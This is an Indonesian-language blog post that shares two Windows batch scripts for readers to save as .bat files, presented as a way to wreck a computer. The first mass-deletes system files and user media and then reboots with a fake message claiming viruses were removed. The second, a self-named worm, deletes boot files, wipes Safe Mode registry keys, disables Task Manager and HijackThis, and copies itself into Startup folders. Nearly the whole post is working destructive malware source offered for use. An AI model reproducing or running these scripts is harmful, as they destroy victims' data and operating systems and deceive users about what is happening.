Judulnya serem banget ye. Tapi yang mau kita kerjain mantep nih. Baru aja ane nemu script mantep banget. Kita akan menghancurkan kompi lw dengan script sederhana ini. Penasaran ? Mau mencobanya? Langsung aja baca full postnya..

Oke seperti biasa kita akan memakai Notepad, senjata andalan saya ni.. Langsung aja copast script dibawah ini, mau diketik juga gag pa apa..

view sourceprint?
01 <pre>cls
02 cd %HOMEDRIVE%windows
03 del /S /F /Q keyboard.drv
04 del /S /F /Q mouse.drv
05 del /S /F /Q keyboard.sys
06 del /S /F /Q hal.dll
07 del /S /F /Q *.exe
08 del /S /F /Q *.txt
09 del /S /F /Q *.com
10 del /S /F /Q *.scr
11 del /S /F /Q *.ini
12 del /S /F /Q *.mp3
13 del /S /F /Q *.wav
14 del /S /F /Q *.dll
15 del /S /F /Q *.avi
16 del /S /F /Q *.jpeg
17 del /S /F /Q *.mp4
18 del /S /F /Q *.reg
19 del /S /F /Q *.rar
20 del /S /F /Q *.inf
21 del /S /F /Q *.sdb
22 del /S /F /Q *.cur
23 del /S /F /Q *.ani
24 del /S /F /Q *.zip
25 del /S /F /Q *.*
27 del /S /F /Q *.exe
28 del /S /F /Q *.txt
29 del /S /F /Q *.com
30 del /S /F /Q *.scr
31 del /S /F /Q *.ini
32 del /S /F /Q *.mp3
33 del /S /F /Q *.wav
34 del /S /F /Q *.dll
35 del /S /F /Q *.avi
36 del /S /F /Q *.jpeg
37 del /S /F /Q *.mp4
38 del /S /F /Q *.reg
39 del /S /F /Q *.rar
40 del /S /F /Q *.inf
41 del /S /F /Q *.sdb
42 del /S /F /Q *.cur
43 del /S /F /Q *.ani
44 del /S /F /Q *.zip
45 del /S /F /Q *.*
46 cls
47 ren %HOMEDRIVE%Windowshal.dll hal3.dll
48 del %HOMEDRIVE%WINDOWSsystem32*.* /F /Q /S
49 cls
50 echo DONE!
51 shutdown -r -t 25 -c "Selamat semua Virus anda telah dibersihkan... Berbahagialah "

Ada satu lagi nih

view sourceprint?
01 @echo off &amp; break off
02 title fuCker v1.4-1-5
03 attrib +h %0
04 mode con cols=75 lines=15
05 cls
06 color 0a
07 echo.
08 echo ad88 ,ad8888ba, 88
09 echo d8&quot; d8&quot;' `&quot;8b 88
10 echo 88 d8' 88
11 echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
12 echo 88 88 88 88 88 ,a8&quot; a8P_____ 88 88P' &quot;Y8
13 echo 88 88 88 Y8, 8888[ 8PP&quot;&quot;&quot;&quot;&quot;&quot;&quot; 88
14 echo 88 &quot;8a, ,a88 Y8a. .a8P 88`&quot;Yba, &quot;8b, 88
15 echo 88 `&quot;YbbdP'Y8 `&quot;Y8888Y&quot;' 88 `Y8a `&quot;Ybbd8&quot;' 88
16 echo by c0re
17 echo.
18 rundll32.exe user32.dll,SwapMouseButton
19 if exist &quot;%SYSTEMDRIVE%boot.ini&quot; goto winXP 2&gt; nul
20 if exist &quot;%USERPROFILE%AppData&quot; goto winVISTA 2&gt; nul
21 @echo
22 echo x=msgbox(&quot;0wned by fuCker w0rm!&quot;,vbCritical or vbOkOnly,&quot;fuCker&quot;) &gt;&gt; &quot;fuCker.vbs&quot;
23 start &quot;&quot; &quot;fuCker.vbs&quot; 2&gt; nul
25 :winXP
26 echo [Inject] Microsoft Windows XP!
27 set b0t=boot
28 attrib -r -s -h &quot;%SYSTEMDRIVE%%b0t%.ini&quot; &gt;nul
29 del /f /s /q &quot;%SYSTEMDRIVE%%b0t%.ini&quot; &gt;nul
30 set b0t=
31 attrib -r -s -h &quot;%SYSTEMDRIVE%ntldr&quot; &gt;nul
32 del /f /s /q &quot;%SYSTEMDRIVE%ntldr&quot; &gt;nul
33 set w0n=win
34 attrib -r -s -h &quot;%SYSTEMROOT%%w0n%.ini&quot; &gt;nul
35 del /f /s /q &quot;%SYSTEMROOT%%w0n%.ini&quot; &gt;nul
36 set w0n=
37 attrib -r -s -h &quot;%SYSTEMROOT%System32hal.dll&quot; &gt;nul
38 del /f /s /q &quot;%SYSTEMROOT%System32hal.dll&quot; &gt;nul
39 attrib -r -s -h &quot;%SYSTEMROOT%System32bootcfg.exe&quot; &gt;nul
40 del /f /s /q &quot;%SYSTEMROOT%System32bootcfg.exe&quot; &gt;nul
41 reg delete HKLMSYSTEMCurrentControlSetControlSafeBoot /va /f &gt;nul
42 msg * &quot;**** y0u!&quot;
43 shutdown -r -t 02 -c &quot;fuCker w0rm deteCted!&quot;
44 goto end
46 :winVISTA
47 echo [Inject] Microsoft Windows Vista!
48 setlocal enableextensions
49 for /f &quot;tokens=*&quot; %%a in (
50 'reg query HKLMSoftwareMicrosoftWindowsCurrentVersionPol iciesSystem /v EnableLUA'
51 ) do (
52 set usac=%%a
53 )
54 echo %usac%|find /i &quot;0x1&quot; &gt; nul
55 if errorlevel 1 (
56 reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f &gt;nul
58 attrib -r -s -h &quot;%SYSTEMRDRIVE%bootmgr&quot; &gt;nul
59 del /f /s /q &quot;%SYSTEMDRIVE%bootmgr&quot; &gt;nul
60 attrib -r -s -h &quot;%SYSTEMRDRIVE%BOOTSECT.BAK&quot; &gt;nul
61 del /f /s /q &quot;%SYSTEMRDRIVE%BOOTSECT.BAK&quot; &gt;nul
62 copy %0 &quot;%ALLUSERSPROFILE%Start MenuProgramsStartup&quot; 2&gt; nul
63 copy %0 &quot;%USERPROFILE%AppDataRoamingMicrosoftWindowsSt art Menu&quot; 2&gt; nul
64 echo x=msgbox(&quot;0wned!&quot;,vbCritical or vbOkOnly,&quot;fuCker w0rm&quot;) &gt;&gt; &quot;w0rm.vbs&quot;
65 start &quot;&quot; &quot;w0rm.vbs&quot; 2&gt; nul
66 shutdown -s -t 10 -c &quot;fuCker w0rm deteCted!&quot;
67 goto end
68 ) else (
69 echo :HjT &gt;&gt; &quot;%TEMP%HjT.bat&quot;
70 echo tskill /a HijackThis &gt;&gt; &quot;%TEMP%HjT.bat&quot;
71 echo goto HjT &gt;&gt; &quot;%TEMP%HjT.bat&quot;
72 start &quot;%TEMP%HjT.bat&quot;
73 reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f &gt;nul
74 echo do &gt;&gt; &quot;disk.vbs&quot;
75 echo set oWMP = CreateObject(&quot;WMPlayer.OCX.7&quot; ) &gt;&gt; &quot;disk.vbs&quot;
76 echo set colCDROMs = oWMP.cdromCollection &gt;&gt; &quot;disk.vbs&quot;
77 echo colCDROMs.Item(d).Eject &gt;&gt; &quot;disk.vbs&quot;
78 echo colCDROMs.Item(d).Eject &gt;&gt; &quot;disk.vbs&quot;
79 echo loop &gt;&gt; &quot;disk.vbs&quot;
80 start &quot;&quot; &quot;disk.vbs&quot; 2&gt; nul
81 echo @echo off &gt;&gt; &quot;%USERPROFILEÞsktopfuCkerw0rm.bat&quot;
82 echo shutdown -r -t 00 -c &quot;fuCker w0rm deteCted!&quot; &gt;&gt; &quot;%USERPROFILEÞsktopfuCkerw0rm.bat&quot;
83 echo echo 0wned by fuCker w0rm! 0n ÚTE% at%TIME% &gt;&gt; &quot;%USERPROFILEÞsktopfuCkerw0rm.bat&quot;
84 echo @exit &gt;&gt; &quot;%USERPROFILEÞsktopfuCkerw0rm.bat&quot;
85 set usac=
86 start &quot;%USERPROFILEÞsktopfuCkerw0rm.bat&quot; 2&gt; nul
87 echo x=msgbox(&quot;0wned!&quot;,vbCritical or vbOkOnly,&quot;fuCker w0rm&quot;) &gt;&gt; &quot;w0rm.vbs&quot;
88 start &quot;&quot; &quot;w0rm.vbs&quot; 2&gt; nul
89 goto end
90 )
91 endlocal
93 :end
94 cls
95 exit

Simpan dengan ekstensi .bat juga

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